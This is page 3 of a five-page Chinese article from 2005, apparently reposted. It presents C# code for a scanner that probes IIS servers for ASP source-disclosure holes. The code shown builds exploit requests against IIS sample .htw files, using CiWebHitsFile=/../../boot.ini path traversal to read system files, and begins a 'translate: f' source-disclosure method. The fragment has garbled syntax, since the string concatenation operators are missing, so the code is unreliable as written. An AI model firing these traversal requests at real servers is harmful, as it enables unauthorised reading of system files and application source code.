2005-11-25

一个用c#写的扫描asp源码漏洞的应用程序(续)

来源: 本站收集整理 作者:佚名 评论 0 条
 

case 17: // search/qsumrhit.htw
strRequestFile = strServer "/iissamples/exair/search/qsumrhit.htw?"
"CiWebHitsFile=/../../boot.ini&CiRestriction=none"
"&CiHiliteType=Full";
break ;

case 18: //iirturnh.htw
strRequestFile = strServer "/iishelp/iis/misc/iirturnh.htw?"
"CiWebHitsFile=/../../boot.ini&CiRestriction=none"
"&CiHiliteType=Full";
break ;

case 19: //.htw
strRequestFile = strServer strUrl
" "
" %"
"20 "
" "
" "
" "
" "
" "
" "
" "
" "
" "
" "
" "
" .htw?"
"CiWebHitsFile=/../../boot.ini&CiRestriction=none"
"&CiHiliteType=Full" ;
break ;

default:
strRequestFile = strServer strUrl this.cboMethod.Text ;
}

this.barStatus.Text = "发送请求:"
(strRequestFile.Length >= 50 ?
strRequestFile.Substring(0 , 50)
:strRequestFile)
"...";

string strResult ;
//假如不是translate:f方法则可以直接发送http请求
if (this.cboMethod.SelectedIndex != 20)
{
//直接发送http请求
strResult = Get_Http(strRequestFile) ;

this.barStatus.Text = "完成。" ;
strResult = strResult == "" ? "未找到!" : strResult ;
this.txtResult.Text = strResult ;
}
else //translate:f方法需要建立tcp/ip连接
{
共5页: 上一页 [1] [2] 3 [4] [5] 下一页
(本文仅表明作者个人观点,不代表本站及其管理员立场.) 推荐 收藏 投稿 打印 返回 关闭
上一篇:JDBC连接Oracle数据库时使用的一些技巧  
下一篇:巧妙使用:Java程序用缓冲IO来提高性能
    评论加载中…
 推荐文章
     

网站首页  -  网站地图 -   站长论坛  -  网站投稿  -    -  网站管理
Copyright © 2008 芜湖站长站 All Rights Reserved 皖ICP备07500611号